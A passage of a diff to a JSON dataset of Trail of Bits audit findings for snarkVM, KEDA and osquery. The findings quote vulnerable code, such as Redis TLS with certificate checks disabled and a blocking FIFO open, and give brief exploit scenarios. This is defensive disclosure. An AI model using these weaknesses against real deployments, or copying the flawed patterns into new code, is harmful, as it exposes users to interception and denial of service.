simple string concatenation, such as with fmt.Sprintf , may fail to parse when given to Go standard library functions. The following source les incorrectly use fmt.Sprintf to create an address: pkg/scalers/cassandra_scaler.go:115 pkg/scalers/mongo_scaler.go:191 pkg/scalers/mssql_scaler.go:220 pkg/scalers/mysql_scaler.go:149 pkg/scalers/predictkube_scaler.go:128 pkg/scalers/redis_scaler.go:296 pkg/scalers/redis_scaler.go:364 Recommendations Short term, use net.JoinHostPort instead of fmt.Sprintf to construct network addresses. The documentation for the net package states the following: JoinHostPort combines host and port into a network address of the form host:port . If host contains a colon, as found in literal IPv6 addresses, then JoinHostPort returns [host]:port . Long term, use Semgrep and the sprintf-host-port rule of semgrep-go to detect future instances of this issue.", "labels": [ "Trail of Bits", "Severity: Informational", @@ -4362,139 +7040,149 @@ ] }, { - "title": "9. Merkle tree constructor panics with large leaf array ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", - "body": "The Merkle tree constructor panics or returns a malformed Merkle tree when the provided leaves array has more than usize::MAX/2 elements. To build a Merkle tree, the constructor receives the necessary array of leaves. Being a binary tree, the nal total number of nodes is computed using the smallest power of two above the number of leaves given: pub fn new (leaf_hasher: & LH , path_hasher: & PH , leaves: & [LH::Leaf]) -> Result < Self > { // Ensure the Merkle tree depth is greater than 0. ensure!(DEPTH > 0 , \"Merkle tree depth must be greater than 0\" ); // Ensure the Merkle tree depth is less than or equal to 64. ensure!(DEPTH <= 64 u8 , \"Merkle tree depth must be less than or equal to 64\" ); // Compute the maximum number of leaves. let max_leaves = leaves.len().next_power_of_two() ; // Compute the number of nodes. let num_nodes = max_leaves - 1 ; Figure 9.1: console/algorithms/src/blake2xs/mod.rs#L32-L47 The next_power_of_two function will panic in debug mode, and return 0 in release mode if the number is larger than (1 << (N-1)) . For the usize type, on 64-bit machines, the function returns 0 for numbers above 2 63 . On 32-bit machines, the necessary number of leaves would be at least 1+2 31 . Exploit Scenario An attacker triggers a call to the Merkle tree constructor with 1+2 31 leaves, causing the 32-bit machine to abort due to a runtime error or to return a malformed Merkle tree. Recommendations Short term, use checked_next_power_of_two and check for success. Check all other uses of the next_power_of_two for similar issues.", + "title": "2. MongoDB scaler does not encode username and password in connection string ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-01-keda-securityreview.pdf", + "body": "The MongoDB scaler creates a connection string URI by concatenating the congured host, port, username, and password: addr := fmt.Sprintf( \"%s:%s\" , meta.host, meta.port) auth := fmt.Sprintf( \"%s:%s\" , meta.username, meta.password) connStr = \"mongodb://\" + auth + \"@\" + addr + \"/\" + meta.dbName Figure 2.1: pkg/scalers/mongo_scaler.go#L191-L193 Per MongoDB documentation, if either the username or password contains a character in the set :/?#[]@ , it must be percent-encoded . However, KEDA does not do this. As a result, the constructed connection string could fail to parse. Exploit Scenario A user congures the MongoDB scaler with a password containing an @ character, and the MongoDB scaler does not encode the password in the connection string. As a result, when the client object is initialized, the URL fails to parse, an error is thrown, and the scaler does not function. Recommendations Short term, percent-encode the user-supplied username and password before constructing the connection string. Long term, use the custom Semgrep rule provided in Appendix C to detect future instances of this issue.", "labels": [ "Trail of Bits", "Severity: Low", - "Difficulty: High" + "Difficulty: Low" ] }, { - "title": "10. Downcast possibly truncates value ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", - "body": "To validate the console's Ciphertext eld vector length against a u32 constant, the program downcasts the length from usize to u32 . This could cause a value truncation and a successful write when an error should occur. Then, the program downcasts the value to a u16 , not checking rst if this is safe without truncation. fn write_le (& self , mut writer: W ) -> IoResult <()> { // Ensure the number of field elements does not exceed the maximum allowed size. if self . 0. len() as u32 > N::MAX_DATA_SIZE_IN_FIELDS { return Err (error( \"Ciphertext is too large to encode in field elements.\" )); } // Write the number of ciphertext field elements. ( self . 0. len() as u16 ).write_le(& mut writer)?; // Write the ciphertext field elements. self . 0. write_le(& mut writer) } } Figure 10.1: console/program/src/data/ciphertext/bytes.rs#L36-L49 Figure 10.2 shows another instance where the value is downcasted to u16 without checking if this is safe: // Ensure the number of field elements does not exceed the maximum allowed size. match num_fields <= N::MAX_DATA_SIZE_IN_FIELDS as usize { // Return the number of field elements. true => Ok ( num_fields as u16 ), Figure 10.2: console/program/src/data/ciphertext/size_in_fields.rs#L21-L30 A similar downcast is present in the Plaintext size_in_fields function . Currently, this downcast causes no issue because the N::MAX_DATA_SIZE_IN_FIELDS constant is less than u16::MAX . However, if this constant were changed, truncating downcasts could occur. Recommendations Short term, upcast N::MAX_DATA_SIZE_IN_FIELDS in Ciphertext::write_le to usize instead of downcasting the vector length, and ensure that the downcasts to u16 are safe.", + "title": "3. Prometheus metrics server does not support TLS ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-01-keda-securityreview.pdf", + "body": "The KEDA Metrics Adapter exposes Prometheus metrics on an HTTP server listening on port 9022. Though Prometheus supports scraping metrics over TLS-enabled connections, KEDA does not oer TLS for this server. The function responsible for starting the HTTP server, prommetrics.NewServer , does so using the http.ListenAndServe function, which does not enable TLS. func (metricsServer PrometheusMetricServer) NewServer(address string , pattern string ) { http.HandleFunc( \"/healthz\" , func (w http.ResponseWriter, _ *http.Request) { w.WriteHeader(http.StatusOK) _, err := w.Write([] byte ( \"OK\" )) if err != nil { log.Fatalf( \"Unable to write to serve custom metrics: %v\" , err) } }) log.Printf( \"Starting metrics server at %v\" , address) http.Handle(pattern, promhttp.HandlerFor(registry, promhttp.HandlerOpts{})) // initialize the total error metric _, errscaler := scalerErrorsTotal.GetMetricWith(prometheus.Labels{}) if errscaler != nil { log.Fatalf( \"Unable to initialize total error metrics as : %v\" , errscaler) } log.Fatal( http.ListenAndServe(address, nil ) ) } Figure 3.1: prommetrics.NewServer exposes Prometheus metrics without TLS ( pkg/prommetrics/adapter_prommetrics.go#L82-L99 ). Exploit Scenario A user sets up KEDA with Prometheus integration, enabling the scraping of metrics on port", "labels": [ "Trail of Bits", - "Severity: Medium", + "Severity: Low", "Difficulty: Low" ] }, { - "title": "11. Plaintext::from_bits_* functions assume array has elements ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", - "body": "The from_bits_le function assumes that the provided array is not empty, immediately indexing the rst and second positions without a length check: /// Initializes a new plaintext from a list of little-endian bits *without* trailing zeros. fn from_bits_le (bits_le: & [ bool ]) -> Result < Self > { let mut counter = 0 ; let variant = [bits_le[counter], bits_le[counter + 1 ]]; counter += 2 ; Figure 11.1: circuit/program/src/data/plaintext/from_bits.rs#L22-L28 A similar pattern is present on the from_bits_be function on both the Circuit and Console implementations of Plaintext . Instead, the function should rst check if the array is empty before accessing elements, or documentation should be added so that the function caller enforces this. Recommendations Short term, check if the array is empty before accessing elements, or add documentation so that the function caller enforces this.", + "title": "6. Redis scalers set InsecureSkipVerify when TLS is enabled ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-01-keda-securityreview.pdf", + "body": "The Redis Lists scaler (of which most of the code is reused by the Redis Streams scaler) supports the enableTLS option to allow the connection to the Redis server to use Transport Layer Security (TLS). However, when creating the TLSConfig for the Redis client, the scaler assigns the InsecureSkipVerify eld to the value of enableTLS (Figure 6.1), which means that certicate and server name verication is always disabled when TLS is enabled. This allows trivial MitM attacks, rendering TLS ineective. if info.enableTLS { options.TLSConfig = &tls.Config{ InsecureSkipVerify: info.enableTLS, } } Figure 6.1: KEDA sets InsecureSkipVerify to the value of info.enableTLS , which is always true in the block above. This pattern occurs in three locations: pkg/scalers/redis_scaler.go#L472-L476 , pkg/scalers/redis_scaler.go#L496-L500 , and pkg/scalers/redis_scaler.go#L517-L521 . KEDA does not document this insecure behavior, and users likely expect that enableTLS is implemented securely to prevent MitM attacks. The only public mention of this behavior is a stale, closed issue concerning this problem on GitHub . Exploit Scenario A user deploys KEDA with the Redis Lists or Redis Streams scaler. To protect the condentiality and integrity of data in transit between KEDA and the Redis server, the user sets the enableTLS metadata eld to true . Unbeknownst to the user, KEDA has disabled TLS certicate verication, allowing attackers on the network to modify the data in transit. An adversary can then falsify metrics coming from Redis to maliciously inuence the scaling behavior of KEDA and the Kubernetes cluster (e.g., by causing a DoS). Recommendations Short term, add a warning to the public documentation that the enableTLS option, as currently implemented, is not secure. Short term, do not enable InsecureSkipVerify when the user species the enableTLS parameter.", "labels": [ "Trail of Bits", - "Severity: Informational", + "Severity: High", "Difficulty: High" ] }, { - "title": "12. Arbitrarily deep recursion causes stack exhaustion ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", - "body": "The codebase has recursive functions that operate on arbitrarily deep structures. This causes a runtime error as the programs stack is exhausted with a very large number of recursive calls. The Plaintext parser allows an arbitrarily deep interface value such as {bar: {bar: {bar: {... bar: true}}} . Since the formatting function is recursive, a suciently deep interface will exhaust the stack on the fmt_internal recursion. We conrmed this nding with a 2880-level nested interface. Parsing the interface with Plaintext::from_str succeeds, but printing the result causes stack exhaustion: #[test] fn test_parse_interface3 () -> Result <()> { let plain = Plaintext::::from_str( /* too long to display */ )?; println! ( \"Found: {plain}\\n\" ); Ok (()) } // running 1 test // thread 'data::plaintext::parse::tests::test_deep_interface' has overflowed its stack // fatal runtime error: stack overflow // error: test failed, to rerun pass '-p snarkvm-console-program --lib' Figure 12.1: console/algorithms/src/blake2xs/mod.rs#L32-L47 The same issue is present on the record and record entry formatting routines. The Record::find function is also recursive, and a suciently large argument array could also lead to stack exhaustion. However, we did not conrm this with a test. Exploit Scenario An attacker provides a program with a 2880-level deep interface, which causes a runtime error if the result is printed. Recommendations Short term, add a maximum depth to the supported data structures. Alternatively, implement an iterative algorithm for creating the displayed structure.", + "title": "7. Insu\u0000cient check against nil ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-01-keda-securityreview.pdf", + "body": "Within a function in the scaler for Azure event hubs, the object partitionInfo is dereferenced before correctly checking it against nil . Before the object is used, a check conrms that partitionInfo is not nil . However, this check is insucient because the function returns if the condition is met, and the function subsequently uses partitionInfo without additional checks against nil . As a result, a panic may occur when partitionInfo is later used in the same function. func (s *azureEventHubScaler) GetUnprocessedEventCountInPartition(ctx context.Context, partitionInfo *eventhub.HubPartitionRuntimeInformation) (newEventCount int64 , checkpoint azure.Checkpoint, err error ) { // if partitionInfo.LastEnqueuedOffset = -1, that means event hub partition is empty if partitionInfo != nil && partitionInfo.LastEnqueuedOffset == \"-1\" { return 0 , azure.Checkpoint{}, nil } checkpoint, err = azure.GetCheckpointFromBlobStorage(ctx, s.httpClient, s.metadata.eventHubInfo, partitionInfo.PartitionID ) Figure 7.1: partionInfo is dereferenced before a nil check pkg/scalers/azure_eventhub_scaler.go#L253-L259 Exploit Scenario While the Azure event hub performs its usual applications, an application error causes GetUnprocessedEventCountInPartition to be called with a nil partitionInfo parameter. This causes a panic and the scaler to crash and to stop monitoring events. Recommendations Short term, edit the code so that partitionInfo is checked against nil before dereferencing it. Long term, use CodeQL and its go/missing-error-check query to detect future instances of this issue.", "labels": [ "Trail of Bits", "Severity: Low", - "Difficulty: Medium" + "Difficulty: High" ] }, { - "title": "13. Inconsistent pair parsing ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", - "body": "The codebase has several implementations to parse pairs from strings of the form key: value depending on the expected type of value . However, these parsers also handle whitespaces around the colon dierently. As an example, gure 13.1 shows a parser that allows whitespaces before the colon, while gure 13.2 shows one that does not: fn parse_pair (string: &str ) -> ParserResult <(Identifier, Plaintext)> { // Parse the whitespace and comments from the string. let (string, _) = Sanitizer::parse(string)?; // Parse the identifier from the string. let (string, identifier) = Identifier::parse(string)?; // Parse the whitespace from the string. let (string, _) = Sanitizer::parse_whitespaces(string)?; // Parse the \":\" from the string. let (string, _) = tag( \":\" )(string)?; // Parse the plaintext from the string. let (string, plaintext) = Plaintext::parse(string)?; Figure 13.1: console/program/src/data/plaintext/parse.rs#L23-L34 fn parse_pair (string: &str ) -> ParserResult <(Identifier, Entry>)> { // Parse the whitespace and comments from the string. let (string, _) = Sanitizer::parse(string)?; // Parse the identifier from the string. let (string, identifier) = Identifier::parse(string)?; // Parse the \":\" from the string. let (string, _) = tag( \":\" )(string)?; // Parse the entry from the string. let (string, entry) = Entry::parse(string)?; Figure 13.2: console/program/src/data/record/parse_plaintext.rs#L23-L33 We also found that whitespaces before the comma symbol are not allowed: let (string, owner) = alt(( map(pair( Address::parse, tag( \".public\" ) ), |(owner, _)| Owner::Public(owner)), map(pair( Address::parse, tag( \".private\" ) ), |(owner, _)| { Owner::Private(Plaintext::from(Literal::Address(owner))) }), ))(string)?; // Parse the \",\" from the string. let (string, _) = tag( \",\" )(string)?; Figure 13.3: console/program/src/data/record/parse_plaintext.rs#L52-L60 Recommendations Short term, handle whitespace around marker tags (such as colon, commas, and brackets) uniformly. Consider implementing a generic pair parser that receives the expected value type parser instead of reimplementing it for each type. 14. Signature veries with di\u0000erent messages Severity: Informational Diculty: Low Type: Cryptography Finding ID: TOB-ALEOA-14 Target: console/account/src/signature/verify.rs", + "title": "8. Prometheus metrics server does not support authentication ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-01-keda-securityreview.pdf", + "body": "When scraping metrics, Prometheus supports multiple forms of authentication , including Basic authentication, Bearer authentication, and OAuth 2.0. KEDA exposes Prometheus metrics but does not oer the ability to protect its metrics server with any of the supported authentication types. Exploit Scenario A user deploys KEDA on a network. An adversary gains access to the network and is able to issue HTTP requests to KEDAs Prometheus metrics server. As KEDA does not support authentication for the server, the attacker can trivially view the exposed metrics. Recommendations Short term, implement one or more of the authentication types that Prometheus supports for scrape targets. A. Vulnerability Categories The following tables describe the vulnerability categories, severity levels, and diculty levels used in this document. Vulnerability Categories Category", "labels": [ "Trail of Bits", - "Severity: Informational", + "Severity: Low", "Difficulty: High" ] }, { - "title": "15. Unchecked output length during ToFields conversion ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", - "body": "When converting dierent types to vectors of Field elements, the codebase has checks to validate that the resulting Field vector has fewer than MAX_DATA_SIZE_IN_FIELDS elements. However, the StringType::to_fields function is missing this validation: impl ToFields for StringType { type Field = Field; /// Casts a string into a list of base fields. fn to_fields (& self ) -> Vec < Self ::Field> { // Convert the string bytes into bits, then chunk them into lists of size // `E::BaseField::size_in_data_bits()` and recover the base field element for each chunk. // (For advanced users: Chunk into CAPACITY bits and create a linear combination per chunk.) self .to_bits_le().chunks(E::BaseField::size_in_data_bits()).map(Field::from_bits_le) .collect() } } Figure 15.1: circuit/types/string/src/helpers/to_fields.rs#L20-L30 We also remark that other conversion functions, such as from_bits and to_bits , do not constraint the input or output length. Recommendations Short term, add checks to validate the Field vector length for the StringType::to_fields function. Determine if other output functions (e.g., to_bits ) should also enforce length constraints.", + "title": "1. Project dependencies are not monitored for vulnerabilities ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/osquery.pdf", + "body": "The osquery project depends on a large number of dependencies to realize the functionality of the existing tables. They are included as Git submodules in the project. The build mechanism of each dependency has been rewritten to suit the specic needs of osquery (e.g., so that it has as few dynamically loaded libraries as possible), but there is no process in place to detect published vulnerabilities in the dependencies. As a result, osquery could continue to use code with known vulnerabilities in the dependency projects. Exploit Scenario An attacker, who has gained a foothold on a machine running osquery, leverages an existing vulnerability in a dependency to exploit osquery. He escalates his privileges to those of the osquery agent or carries out a denial-of-service attack to block the osquery agent from sending data. Recommendations Short term, regularly update the dependencies to their latest versions. Long term, establish a process within the osquery project to detect published vulnerabilities in its dependencies. 15 Atlassian: osquery Security Assessment", "labels": [ "Trail of Bits", - "Severity: Low", - "Difficulty: High" + "Severity: High", + "Difficulty: Medium" ] }, { - "title": "16. Potential panic on ensure_console_and_circuit_registers_match ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", - "body": "The codebase implements the ensure_console_and_circuit_registers_match function, which validates that the values on the console and circuit registers match. The function uses zip_eq to iterate over the two register arrays, but does not check if these arrays have the same length, leading to a runtime error when they do not. pub fn ensure_console_and_circuit_registers_match (& self ) -> Result <()> { use circuit::Eject; for ((console_index, console_register), (circuit_index, circuit_register)) in self .console_registers.iter(). zip_eq (& self .circuit_registers) Figure 16.1: vm/compiler/src/process/registers/mod.rs This runtime error is currently not reachable since the ensure_console_and_circuit_registers_match function is called only in CallStack::Execute mode, and the number of stored registers match in this case: // Store the inputs. function.inputs().iter().map(|i| i.register()).zip_eq(request.inputs()).try_for_each(|(register, input)| { // If the circuit is in execute mode, then store the console input. if let CallStack::Execute(..) = registers.call_stack() { // Assign the console input to the register. registers.store( self , register, input.eject_value())?; } // Assign the circuit input to the register. registers.store_circuit( self , register, input.clone()) })?; Figure 16.2: vm/compiler/src/process/stack/execute.rs Recommendations Short term, add a check to validate that the number of circuit and console registers match on the ensure_console_and_circuit_registers_match function.", + "title": "2. No separation of privileges when executing dependency code ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/osquery.pdf", + "body": "In several places in the codebase, the osquery agent realizes the functionality of a table by invoking code in a dependency project. For example, the yara table is implemented by invoking code in libyara. However, there is no separation of privileges or sandboxing in place when the code in the dependency library is called, so the library code executes with the same privileges as the osquery agent. Considering the projects numerous dependencies, this issue increases the osquery agents attack surface and would exacerbate the eects of any vulnerabilities in the dependencies. Exploit Scenario An attacker nds a vulnerability in a dependency library that allows her to gain code execution, and she elevates her privileges to that of the osquery agent. Recommendations Short term, regularly update the dependencies to their latest versions. Long term, create a security barrier against the dependency library code to minimize the impact of vulnerabilities. 16 Atlassian: osquery Security Assessment", + "labels": [ + "Trail of Bits", + "Severity: High", + "Difficulty: Medium" + ] + }, + { + "title": "3. No limit on the amount of information that can be read from the Firefox add-ons table ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/osquery.pdf", + "body": "The implementation of the Firefox add-ons table has no limit on the amount of information that it can read from JSON les while enumerating the add-ons installed on a user prole. This is because to directly read and parse the Firefox prole JSON le, the parseJSON implementation in the osquery agent uses boost::property_tree, which does not have this limit. pt::ptree tree; if (!osquery::parseJSON(path + kFirefoxExtensionsFile, tree).ok()) { TLOG << \"Could not parse JSON from: \" << path + kFirefoxExtensionsFile; return; } Figure 3.1: The osquery::parseJSON function has no limit on the amount of data it can read. Exploit Scenario An attacker crafts a large, valid JSON le and stores it on the Firefox prole path as extensions.json (e.g., in ~/Library/Application Support/Firefox/Profiles/foo/extensions.json on a macOS system). When osquery executes a query using the firefox_addons table, the parseJSON function reads and parses the complete le, causing high resource consumption. Recommendations Short term, enforce a maximum le size within the Firefox table, similar to the limits on other tables in osquery. Long term, consider removing osquery::parseJSON and implementing a single, standard way to parse JSON les across osquery. The osquery project currently uses both boost::property_tree and RapidJSON libraries to parse JSON les, resulting in the use of dierent code paths to handle untrusted content. 17 Atlassian: osquery Security Assessment", "labels": [ "Trail of Bits", "Severity: Low", - "Difficulty: High" + "Difficulty: Low" ] }, { - "title": "17. Reserved keyword list is missing owner ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", - "body": "The compiler veries that identiers are not part of a list of reserved keywords. However, the list of keywords is missing the owner keyword. This contrasts with the other record eld, gates , which is a reserved keyword. // Record \"record\" , \"gates\" , // Program Figure 17.1: vm/compiler/src/program/mod.rs Recommendations Short term, add owner to the list of reserved keywords.", + "title": "4. The SIP status on macOS may be misreported ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/osquery.pdf", + "body": "If System Integrity Protection (SIP) is disabled on a Mac running osquery, the SIP conguration table might not report the correct value in the enabled column for the config_flag: sip row. For this misreporting to happen, extra ags need to be present in the value returned by csr_get_active_config and absent in the osquery kRootlessConfigFlags list. This is the case for the ags CSR_ALLOW_ANY_RECOVERY_OS, CSR_ALLOW_UNAPPROVED_KEXTS, CSR_ALLOW_EXECUTABLE_POLICY_OVERRIDE, and CSR_ALLOW_UNAUTHENTICATED_ROOT in xnu-7195.141.2/bsd/sys/csr.h (compare gure 4.1 and gure 4.3). /* CSR configuration flags */ #define CSR_ALLOW_UNTRUSTED_KEXTS (1 << 0) #define CSR_ALLOW_UNRESTRICTED_FS (1 << 1) #define CSR_ALLOW_TASK_FOR_PID (1 << 2) #define CSR_ALLOW_KERNEL_DEBUGGER (1 << 3) #define CSR_ALLOW_APPLE_INTERNAL (1 << 4) #define CSR_ALLOW_DESTRUCTIVE_DTRACE (1 << 5) /* name deprecated */ #define CSR_ALLOW_UNRESTRICTED_DTRACE (1 << 5) #define CSR_ALLOW_UNRESTRICTED_NVRAM (1 << 6) #define CSR_ALLOW_DEVICE_CONFIGURATION (1 << 7) #define CSR_ALLOW_ANY_RECOVERY_OS (1 << 8) #define CSR_ALLOW_UNAPPROVED_KEXTS (1 << 9) #define CSR_ALLOW_EXECUTABLE_POLICY_OVERRIDE (1 << 10) #define CSR_ALLOW_UNAUTHENTICATED_ROOT (1 << 11) Figure 4.1: The CSR ags in xnu-7159.141.2 18 Atlassian: osquery Security Assessment QueryData results; csr_config_t config = 0; csr_get_active_config(&config); csr_config_t valid_allowed_flags = 0; for (const auto& kv : kRootlessConfigFlags) { valid_allowed_flags |= kv.second; } Row r; r[\"config_flag\"] = \"sip\"; if (config == 0) { // SIP is enabled (default) r[\"enabled\"] = INTEGER(1); r[\"enabled_nvram\"] = INTEGER(1); } else if ((config | valid_allowed_flags) == valid_allowed_flags) { // mark SIP as NOT enabled (i.e. disabled) if // any of the valid_allowed_flags is set r[\"enabled\"] = INTEGER(0); r[\"enabled_nvram\"] = INTEGER(0); } results.push_back(r); Figure 4.2: How the SIP state is computed in genSIPConfig // rootless configuration flags // https://opensource.apple.com/source/xnu/xnu-3248.20.55/bsd/sys/csr.h const std::map kRootlessConfigFlags = { // CSR_ALLOW_UNTRUSTED_KEXTS {\"allow_untrusted_kexts\", (1 << 0)}, // CSR_ALLOW_UNRESTRICTED_FS {\"allow_unrestricted_fs\", (1 << 1)}, // CSR_ALLOW_TASK_FOR_PID {\"allow_task_for_pid\", (1 << 2)}, // CSR_ALLOW_KERNEL_DEBUGGER {\"allow_kernel_debugger\", (1 << 3)}, // CSR_ALLOW_APPLE_INTERNAL {\"allow_apple_internal\", (1 << 4)}, // CSR_ALLOW_UNRESTRICTED_DTRACE {\"allow_unrestricted_dtrace\", (1 << 5)}, // CSR_ALLOW_UNRESTRICTED_NVRAM {\"allow_unrestricted_nvram\", (1 << 6)}, // CSR_ALLOW_DEVICE_CONFIGURATION {\"allow_device_configuration\", (1 << 7)}, }; Figure 4.3: The ags currently supported by osquery 19 Atlassian: osquery Security Assessment Exploit Scenario An attacker, who has gained a foothold with root privileges, disables SIP on a device running macOS and sets the csr_config ags to 0x3e7. When building the response for the sip_config table, osquery misreports the state of SIP. Recommendations Short term, consider reporting SIP as disabled if any ag is present or if any of the known ags are present (e.g., if (config & valid_allowed_flags) != 0). Long term, add support for reporting the raw ag values to the table specication and code so that the upstream server can make the nal determination on the state of SIP, irrespective of the ags supported by the osquery daemon. Additionally, monitor for changes and add support for new ags as they are added on the macOS kernel. 20 Atlassian: osquery Security Assessment", "labels": [ "Trail of Bits", - "Severity: Low", + "Severity: Informational", "Difficulty: High" ] }, { - "title": "18. Commit and hash instructions not matched against the opcode in check_instruction_opcode ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", - "body": "The check_instruction_opcode function validates that the opcode and instructions match for the Literal , Call , and Cast opcodes, but not for the Commit and Hash opcodes. Although there is partial code for this validation, it is commented out: Opcode::Commit(opcode) => { // Ensure the instruction belongs to the defined set. if ![ \"commit.bhp256\" , \"commit.bhp512\" , \"commit.bhp768\" , \"commit.bhp1024\" , \"commit.ped64\" , \"commit.ped128\" , ] .contains(&opcode) { bail!( \"Instruction '{instruction}' is not the opcode '{opcode}'.\" ); } // Ensure the instruction is the correct one. // match opcode { // \"commit.bhp256\" => ensure!( // matches!(instruction, Instruction::CommitBHP256(..)), // \"Instruction '{instruction}' is not the opcode '{opcode}'.\" // ), // } } Opcode::Hash(opcode) => { // Ensure the instruction belongs to the defined set. if ![ \"hash.bhp256\" , \"hash.bhp512\" , \"hash.bhp768\" , \"hash.bhp1024\" , \"hash.ped64\" , \"hash.ped128\" , \"hash.psd2\" , \"hash.psd4\" , \"hash.psd8\" , ] .contains(&opcode) { bail!( \"Instruction '{instruction}' is not the opcode '{opcode}'.\" ); } // Ensure the instruction is the correct one. // match opcode { // \"hash.bhp256\" => ensure!( // matches!(instruction, Instruction::HashBHP256(..)), // \"Instruction '{instruction}' is not the opcode '{opcode}'.\" // ), // } } Figure 18.1: vm/compiler/src/process/stack/helpers/insert.rs Recommendations Short term, add checks to validate that the opcode and instructions match for the Commit and Hash opcodes.", + "title": "5. The OpenReadableFile function can hang on reading a le ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/osquery.pdf", + "body": "The OpenReadableFile function creates an instance of the PlatformFile class, which is used for reading and writing les. The constructor of PlatformFile uses the open syscall to obtain a handle to the le. The OpenReadableFile function by default opens the le using the O_NONBLOCK ag, but if PlatformFiles isSpecialFile method returns true, it opens the le without using O_NONBLOCK. On the POSIX platform, the isSpecialFile method returns true for les in which fstat returns a size of zero. If the le to be read is a FIFO, the open syscall in the second invocation of PlatformFiles constructor blocks the osquery thread until another thread opens the FIFO le to write to it. struct OpenReadableFile : private boost::noncopyable { public: explicit OpenReadableFile(const fs::path& path, bool blocking = false) : blocking_io(blocking) { int mode = PF_OPEN_EXISTING | PF_READ; if (!blocking) { mode |= PF_NONBLOCK; } // Open the file descriptor and allow caller to perform error checking. fd = std::make_unique(path, mode); if (!blocking && fd->isSpecialFile()) { // A special file cannot be read in non-blocking mode, reopen in blocking // mode mode &= ~PF_NONBLOCK; blocking_io = true; fd = std::make_unique(path, mode); } } public: std::unique_ptr fd{nullptr}; 21 Atlassian: osquery Security Assessment bool blocking_io; }; Figure 5.1: The OpenReadableFile function can block the osquery thread. Exploit Scenario An attacker creates a special le, such as a FIFO, in a path known to be read by the osquery agent. When the osquery agent attempts to open and read the le, it blocks the osquery thread indenitely, in eect making osquery unable to report the status to the server. Recommendations Short term, ensure that the le operations in filesystem.cpp do not block the osquery thread. Long term, introduce a timeout on le operations so that a block does not stall the osquery thread. References The Single Unix Specication, Version 2 22 Atlassian: osquery Security Assessment", "labels": [ "Trail of Bits", "Severity: Medium", - "Difficulty: High" + "Difficulty: Low" ] }, { - "title": "19. Incorrect validation of the number of operands ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-09-aleosystems-snarkvm-securityreview.pdf", - "body": "The implementation of Literals::fmt and Literals::write_le do not correctly validate the number of operands in the operation. Instead of enforcing the exact number of arguments, the implementations only ensure that the number of operands is less than or equal to the expected number of operands: /// Writes the operation to a buffer. fn write_le (& self , mut writer: W ) -> IoResult <()> { // Ensure the number of operands is within the bounds. if NUM_OPERANDS > N::MAX_OPERANDS { return Err (error( format! ( \"The number of operands must be <= {}\" , N::MAX_OPERANDS))); } // Ensure the number of operands is correct. if self .operands.len() > NUM_OPERANDS { return Err (error( format! ( \"The number of operands must be {}\" , NUM_OPERANDS))); } Figure 19.1: vm/compiler/src/program/instruction/operation/literals.rs#L294-L303 Recommendations Short term, replace the if statement guard with self.operands.len() != NUM_OPERANDS in both the Literals::fmt and Literals::write_le functions.", + "title": "6. Methods in POSIX PlatformFile class are susceptible to race conditions ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/osquery.pdf", + "body": "The POSIX implementation of the methods in the PlatformFile class includes several methods that return the current properties of a le. However, the properties can change during the lifetime of the le descriptor, so the return values of these methods may not reect the actual properties. For example, the isSpecialFile method, which is used to determine the strategy for reading the le, calls the size method. However, the le size can change between the time of the call and the reading operation, in which case the wrong strategy for reading the le could be used. bool PlatformFile::isSpecialFile() const { return (size() == 0); } static uid_t getFileOwner(PlatformHandle handle) { struct stat file; if (::fstat(handle, &file) < 0) { return -1; } return file.st_uid; } Status PlatformFile::isOwnerRoot() const { if (!isValid()) { return Status(-1, \"Invalid handle_\"); } uid_t owner_id = getFileOwner(handle_); if (owner_id == (uid_t)-1) { return Status(-1, \"fstat error\"); } if (owner_id == 0) { return Status::success(); } return Status(1, \"Owner is not root\"); } Status PlatformFile::isOwnerCurrentUser() const { 23 Atlassian: osquery Security Assessment if (!isValid()) { return Status(-1, \"Invalid handle_\"); } uid_t owner_id = getFileOwner(handle_); if (owner_id == (uid_t)-1) { return Status(-1, \"fstat error\"); } if (owner_id == ::getuid()) { return Status::success(); } return Status(1, \"Owner is not current user\"); } Status PlatformFile::isExecutable() const { struct stat file_stat; if (::fstat(handle_, &file_stat) < 0) { return Status(-1, \"fstat error\"); } if ((file_stat.st_mode & S_IXUSR) == S_IXUSR) { return Status::success(); } return Status(1, \"Not executable\"); } Status PlatformFile::hasSafePermissions() const { struct stat file; if (::fstat(handle_, &file) < 0) { return Status(-1, \"fstat error\"); } // We allow user write for now, since our main threat is external // modification by other users if ((file.st_mode & S_IWOTH) == 0) { return Status::success(); } return Status(1, \"Writable\"); } Figure 6.1: The methods in PlatformFile could cause race issues. Exploit Scenario A new function is added to osquery that uses hasSafePermissions to determine whether to allow a potentially unsafe operation. An attacker creates a le that passes the hasSafePermissions check, then changes the permissions and alters the le contents before the le is further processed by the osquery agent. 24 Atlassian: osquery Security Assessment Recommendations Short term, refactor the operations of the relevant PlatformFile class methods to minimize the race window. For example, the only place hasSafePermissions is currently used is in the safePermissions function, in which it is preceded by a check that the le is owned by root or the current user, 